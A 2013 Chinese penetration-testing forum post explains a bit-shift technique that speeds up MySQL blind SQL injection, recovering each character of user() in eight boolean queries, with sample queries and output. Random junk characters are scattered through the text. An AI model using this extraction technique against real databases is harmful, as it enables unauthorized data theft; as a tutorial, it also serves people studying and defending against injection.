中国网络渗透测试联盟

标题: 关于通过对8bit的ascii做右位移提高mysql盲注效率 [打印本页]

---

作者: admin    时间: 2013-3-7 13:25
标题: 关于通过对8bit的ascii做右位移提高mysql盲注效率
通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位
+ H- H$ z& B5 |8 A$ A  D$ z2 Q. {


下面将以查询mysql数据库当中user()的第一位为例:
8 [" W+ `4 x8 E/ s$ p8 f! Q$ p
3 R' [* K" I: y5 e4 }5 N
+ ^& ^9 q! q2 B, i) w: `- U
  {4 B4 }( M5 o* G% i3 I+ aps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)
" Q) C0 N$ W# K" H' |
  |) ^: H4 c2 v9 |
0 A8 P1 `" q) \: P; Q  }: t
, z( I$ i$ O& B4 [: z' n. _) L* Y首先执行如下sql语句:


5 a5 m0 P. R5 k) P$ _/ ~. a
5 A* e. C9 `# T7 x3 M; v$ _mysql> select (ascii((substr(user(),1,1))) >> 7)=0;



9 n* B- z0 V" }" D6 |7 v+ D我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的

5 R/ L# w0 ?" R
+ S4 N$ E' U* h% H
# \3 w4 M8 H3 N$ N. D; N4 N第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1
/ C1 E" B  u' w! n6 C
8 t* X8 _! j! x

* d: {; n( M' ~如果运算结果为1,说明第一位为0,不为1


& _$ H+ Y- c$ J9 n/ J( w$ Y, q
+————————————–+

| (ascii((substr(user(),1,1))) >> 7)=0 |

5 \, }% X% B2 y+————————————–+
6 X5 S: y1 ~' K# O
2 ^8 }8 {# c  |$ h| 1 |
' g, Q1 M5 Z9 N+ j
2 x( d) E2 A3 I% a$ `  _+————————————–+
# Q$ y4 g+ x; y
7 h8 ^- v" y7 v0 T1 row in set (0.00 sec)

9 _3 B/ m2 o8 ^7 K这样我们就确定这个8bit的ascii的第一位为0



4 G6 G! @& j4 ?! q  N) c0 q! V' R第二次我们来做6次右偏移来确定前两位



' X# v9 h1 V; o6 |4 d7 c/ z0 V前两位可能是01或00,即依然可以与0做比较,
! m+ U- B- |' U+ G4 o0 F
, r- V3 Z& r  c. l" b8 |0 amysql> select (ascii((substr(user(),1,1))) >> 6)=0;
( a4 z2 V/ o6 U+ D: Z9 q
+————————————–+

) z! v9 m; m' u* v' T$ n" y: i| (ascii((substr(user(),1,1))) >> 6)=0 |

1 q; x* {3 w0 y7 A. q+————————————–+
4 x7 S4 G7 ?, g- q( P. U
| 0 |

+————————————–+

! C6 v" ?1 O2 d* S1 row in set (0.00 sec)
# c, W: w: _  g& o( u$ c

4 U( u' \& Y1 o) o
' J. J4 d/ R2 @结果为0,即第二位为1
1 ^: C3 e+ K3 Q+ W' f3 }

) o: Y7 N( T& t( i& ~7 }. p; d
开始猜测前三位为010或011
- q2 Y+ u1 z; i  T. O
3 ?/ {- F) U1 N
. A+ u# x6 U7 b: L
让我们看看010和011的ascii码是多少

8 r, [4 k& i& p
; }+ o8 W7 O# g" n, N
分别查询select b’011′ select b’010′
" J$ _  B, ^  O1 x6 h
$ Y( M( B4 @. P3 B1 k0 H3 V

获得结果 010 = 2 011 = 3
  p* n/ K4 W2 z, Q' ]* [

6 u9 m! @* P' w) P
1 p) ]$ s! x. S9 H执行如下sql:



0 |, F0 ]+ {. T! v: ?% m* Fmysql> select (ascii((substr(user(),1,1))) >> 5)=2;

+————————————–+
- `+ @& N$ t/ m  k! y! I
* ?% T, }' y9 p' e0 H| (ascii((substr(user(),1,1))) >> 5)=2 |

" h1 E6 e2 N) O3 `+————————————–+
- e9 ^4 f7 {& ?0 Z% P
| 0 |

+————————————–+
/ J) E7 \8 m  q6 o: m( T, A( c1 C& u
4 Z# `( N* O( B' g6 A$ u# i即前三位不为010,而是011
# \) Y; v; V9 R# o, ?) N# V. E, T
/ C0 E  k4 N6 L/ X9 i! h0 K: g

' B( k. ~4 ?+ {5 \! A4 R( g直到获得最后一位
3 J% s5 x+ G3 f6 J0 M/ q


# K' a; ?% g/ D4 I最终结果为:01110010
7 X" x0 f1 q1 ]7 P' R+ o

3 z$ [3 l6 m& `6 ^% ?  [
转换一下:
. s! x4 w4 [" U. P* }+ g

: P" Y+ S6 w# R
5 y6 c3 ~% F/ I9 [select b’01110010′

  l# b4 M2 D/ L* K

查询结果

; J; q2 ]# F3 {, P0 \4 i

0 p/ w: V" |( g+————-+
% U% C# z* ^9 D
| b’01110010′ |
2 g6 O* V: E! ~4 O
+————-+

| r |

+————-+
! q7 L. H  G) d7 F/ E/ b- P
5 `9 a& z# |! F$ C  A1 row in set (0.00 sec)

9 i/ L9 b+ Z1 J& ^0 E7 Y

这样我们就获得了user()的第一位.其它位依此类推
6 _/ E5 b: S3 T! w, E
1 Z' }0 D0 L! @& a/ Y& S

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2